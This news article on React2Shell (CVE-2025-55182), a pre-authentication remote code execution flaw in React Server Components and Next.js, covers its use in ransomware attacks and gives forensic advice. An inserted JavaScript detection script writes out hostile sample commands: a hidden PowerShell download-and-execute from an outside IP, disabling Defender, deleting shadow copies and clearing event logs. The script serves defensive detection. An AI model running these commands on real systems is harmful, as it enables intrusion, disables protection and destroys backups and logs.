React2Shell is the Log4j moment for front end development


Attackers have upped the ante in their exploits of a recently-disclosed maximum severity vulnerability in React Server Components (RSC), Next.js, and related frameworks.

Financially-motivated attackers have found a way to use the flaw, dubbed React2Shell (CVE-2025-55182), to execute arbitrary code on vulnerable servers through a single malicious HTTP request. This allows them to quickly and easily gain access to a corporate network and deploy ransomware, according to researchers at cybersecurity company S-RM and the Microsoft Defender Security Research Team.

Attackers initially exploited the vulnerability to introduce backdoor malware and crypto miners; this new method represents an escalation, and experts say it reveals a fundamental security flaw in front end development.

“For too long, we’ve treated front end development as low end, low risk work,” said David Shipley of Beauceron Security. “This is to the front end of applications what Log4j was to the back end, a massive opportunity for attackers.”

How attackers easily get ‘highly privileged’ access

React is widely used in enterprise environments, with Microsoft researchers identifying “tens of thousands of distinct devices across several thousand organizations” running React or React-based applications.

React2Shell is a pre-authentication remote code execution (RCE) vulnerability affecting React Server Components (RSC), the open-source framework Next.js, and other related frameworks. It has been rated a 10 on the Common Vulnerability Scoring System (CVSS) because it is easy to exploit, puts numerous exposed systems at risk, and is highly susceptible to automated attacks since it doesn’t require authentication to execute.

The vulnerability sits in the Flight protocol, the wire format that React Server Components and Next.js use to move rendered component trees and server-function calls between server and client. RSC is not a single package: it is a set of React packages, framework integrations, and bundler plugins that let a React app run parts of its rendering and logic on the server rather than in the browser.

Flight is how the two sides talk. When the client calls the server (for example, to invoke a server function), it sends a Flight-encoded payload; the server deserializes that payload, executes the corresponding server-side logic, and streams back the result in the same text-based, line-oriented serialization, which the client decodes into a component tree.

With React2Shell, affected versions of the RSC server packages fail to properly validate the Flight payload they deserialize from a request, so a crafted payload is treated as legitimate data. An attacker can therefore send an HTTP request that makes the server run attacker-controlled code, potentially giving them “highly privileged” access to unpatched systems, according to the S-RM researchers.

According to initial reporting on React2Shell, nation-state actors began exploiting the vulnerability within hours of public disclosure. While early impact was limited to the installation of persistent backdoors into networks and cryptocurrency mining, React2Shell is now being used as the initial access vector in a ransomware attack.

S-RM notes that it is likely being used by “less sophisticated actors” targeting public-facing web servers.

The Microsoft researchers warn of the dangers of this vulnerability:

It can be exploited with just one HTTP request;

Default configurations are vulnerable, meaning there’s no special setup and attackers don’t have to wait for user mistakes;

Exploitation requires no authentication, because the vulnerable code path runs before any application-level authentication takes place;

Proof-of-concept exploits show near-100% reliability.

“For all the over-talk on zero trust, here’s a great example of where it would’ve been useful,” said Beauceron’s Shipley. “Way too much trust and access was built into the React model. And attackers figured out how to exploit it.”

What to look for

In an attack tracked by S-RM, immediately after gaining access to the targeted company’s network, the threat actor ran a PowerShell command launched with a hidden window. It established command and control (C2) by downloading a Cobalt Strike PowerShell stager (tooling regularly used by red teams as well) and installing a beacon so the compromised host could talk to the attackers’ external servers. They then disabled real-time protection in Windows Defender Antivirus.

The ransomware binary was dropped and executed “within less than one minute of initial access,” the S-RM researchers report. The attackers encrypted files, left ransom notes, created text files containing the target’s public IP address, and cleared event logs and backup snapshots.

The researchers noted that they did not observe lateral movement to other systems or attempts to steal data. The compromised server was taken down the day after it was discovered.

S-RM advises enterprises using RSC to verify that they are running a fully patched version. Note that React has since warned that its initial patch releases were incomplete and has issued follow-up releases; confirm that the installed version of each affected package matches React’s current advisory (the versions cited at the time of writing are 19.0.2, 19.1.3, and 19.2.2) rather than assuming the first patch release is sufficient.

Beyond patching, organizations should perform forensic reviews to check for:

Unusual outbound connections that could indicate command and control (C2) traffic;

Disabling of antivirus and endpoint protection, or clearing or tampering with logs;

Unusual spikes in resource use, which could indicate crypto miners;

Windows event logs or endpoint detection and response (EDR) telemetry showing in-memory execution or child processes spawned from Node or React-related processes;

Indicators of compromise (IOC) detailed in the researchers’ advisory, both host-based and network-based.
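To make that checklist concrete, here is an added example of the host-side detection logic (it is not the researchers’ tooling and not from the article). It scans process-creation telemetry for the behaviours described in the S-RM attack: a shell spawned by a Node.js web-server process, a hidden or encoded PowerShell launch, Defender real-time protection being switched off, event logs being cleared, and backup snapshots being deleted. It then flags any host where several distinct rules fire within a short window, which is the “ransomware within a minute” pattern. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); adapt the extraction to your EDR’s schema. All sample events are constructed.

```javascript
// Added example: rule-based triage of process-creation telemetry for the
// post-exploitation chain the article describes. Not the researchers' tooling.

const RULES = [
  {
    name: 'shell_spawned_by_node',
    severity: 'high',
    test: e => /\\node(\.exe)?$/i.test(e.ParentImage)
      && /\\(powershell|pwsh|cmd)(\.exe)?$/i.test(e.Image),
  },
  {
    name: 'hidden_or_encoded_powershell',
    severity: 'medium',
    test: e => /\\(powershell|pwsh)(\.exe)?$/i.test(e.Image)
      && /(-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+\/=]{20,})/i.test(e.CommandLine),
  },
  {
    name: 'defender_realtime_disabled',
    severity: 'high',
    test: e => /Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true/i.test(e.CommandLine),
  },
  {
    name: 'event_log_cleared',
    severity: 'high',
    test: e => /\bwevtutil(\.exe)?\s+(cl|clear-log)\b/i.test(e.CommandLine)
      || /\bClear-EventLog\b/i.test(e.CommandLine),
  },
  {
    name: 'shadow_copies_deleted',
    severity: 'high',
    test: e => /\bvssadmin(\.exe)?\s+delete\s+shadows\b/i.test(e.CommandLine)
      || /\bwmic(\.exe)?\s+shadowcopy\s+delete\b/i.test(e.CommandLine),
  },
];

// Run every rule over every event; one event can produce several hits.
function evaluate(events) {
  const hits = [];
  for (const e of events) {
    for (const r of RULES) {
      if (r.test(e)) {
        hits.push({ rule: r.name, severity: r.severity, time: e.UtcTime, host: e.Computer, commandLine: e.CommandLine });
      }
    }
  }
  return hits;
}

// Hosts where at least minDistinctRules different rules fire inside windowMs.
function hostsWithChain(hits, windowMs = 5 * 60 * 1000, minDistinctRules = 3) {
  const byHost = new Map();
  for (const h of hits) {
    if (!byHost.has(h.host)) byHost.set(h.host, []);
    byHost.get(h.host).push(h);
  }
  const flagged = [];
  for (const [host, list] of byHost) {
    list.sort((a, b) => Date.parse(a.time) - Date.parse(b.time));
    for (let i = 0; i < list.length; i++) {
      const start = Date.parse(list[i].time);
      const rules = new Set();
      for (let j = i; j < list.length && Date.parse(list[j].time) - start <= windowMs; j++) rules.add(list[j].rule);
      if (rules.size >= minDistinctRules) { flagged.push(host); break; }
    }
  }
  return flagged;
}

// Constructed sample telemetry (Sysmon-style fields). 203.0.113.5 is a documentation address.
const PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
const SAMPLE_EVENTS = [
  { UtcTime: '2025-12-10T14:02:11Z', Computer: 'WEB01', ParentImage: 'C:\\Program Files\\nodejs\\node.exe', Image: PS,
    CommandLine: 'powershell.exe -w hidden -nop -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.5/a\')"' },
  { UtcTime: '2025-12-10T14:02:40Z', Computer: 'WEB01', ParentImage: PS, Image: PS,
    CommandLine: 'powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true' },
  { UtcTime: '2025-12-10T14:02:58Z', Computer: 'WEB01', ParentImage: 'C:\\Windows\\System32\\cmd.exe',
    Image: 'C:\\Windows\\System32\\vssadmin.exe', CommandLine: 'vssadmin delete shadows /all /quiet' },
  { UtcTime: '2025-12-10T14:03:05Z', Computer: 'WEB01', ParentImage: 'C:\\Windows\\System32\\cmd.exe',
    Image: 'C:\\Windows\\System32\\wevtutil.exe', CommandLine: 'wevtutil cl Security' },
  // Benign: a build server where node spawns node, no shell involved.
  { UtcTime: '2025-12-10T09:15:00Z', Computer: 'BUILD02', ParentImage: 'C:\\Program Files\\nodejs\\node.exe',
    Image: 'C:\\Program Files\\nodejs\\node.exe', CommandLine: 'node node_modules\\next\\dist\\bin\\next build' },
];

const hits = evaluate(SAMPLE_EVENTS);
for (const h of hits) console.log(`${h.time} ${h.host} [${h.severity}] ${h.rule}: ${h.commandLine}`);
console.log('hosts with a chained sequence:', hostsWithChain(hits));
```

The individual rules are deliberately ordinary; what gives them weight here is the parent process (a Node.js web server has no business launching PowerShell) and the correlation across rules on one host in under a minute. Tune the window and threshold to your environment and treat the regexes as a starting point, since command-line obfuscation will defeat them.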

Front end is no longer low-risk

This vulnerability reveals a fundamental gap in the development environment that has largely been overlooked, experts say.

“There is a dangerous comforting lie we tell ourselves in web development: ‘The frontend is safe.’ It isn’t,” notes web engineer Louis Phang. He called this a “logic error in the way modern servers talk to clients,” that turns a standard web request into a weapon. It is the result of developers focusing on reliability, scalability, and maintainability, rather than security.

For years, all that happened when a front end developer made a mistake was that a button looked wrong, a layout broke, or, in a worst-case scenario, cross-site scripting (XSS), which allows attackers to inject malicious scripts into web pages, became possible, Phang said. With React rendering on the server, front end code has privileged access, and vulnerabilities serve as a backdoor into databases, keys, and data.

“React2Shell signifies the end of the front end developer as a low-risk role,” Phang contended.

Beauceron’s Shipley agreed, noting that the need for server-side heavy lifting changed the risk, but the tech stack didn’t respond accordingly.

“First, we had confusion about whether it was severe or not, then some were downplaying how much exploitation would happen, and now we’re in a feeding frenzy,” he said.

It’s concerning how long it’s taking to rouse the technology environment to deal with this threat; it could ultimately be a side effect of cuts to security teams and budgets and developer burnout, he noted.

“This is a concerning trend heading into 2026, which will be even more intense for zero days thanks to AI,” Shipley predicted.

This article originally appeared on InfoWorld.
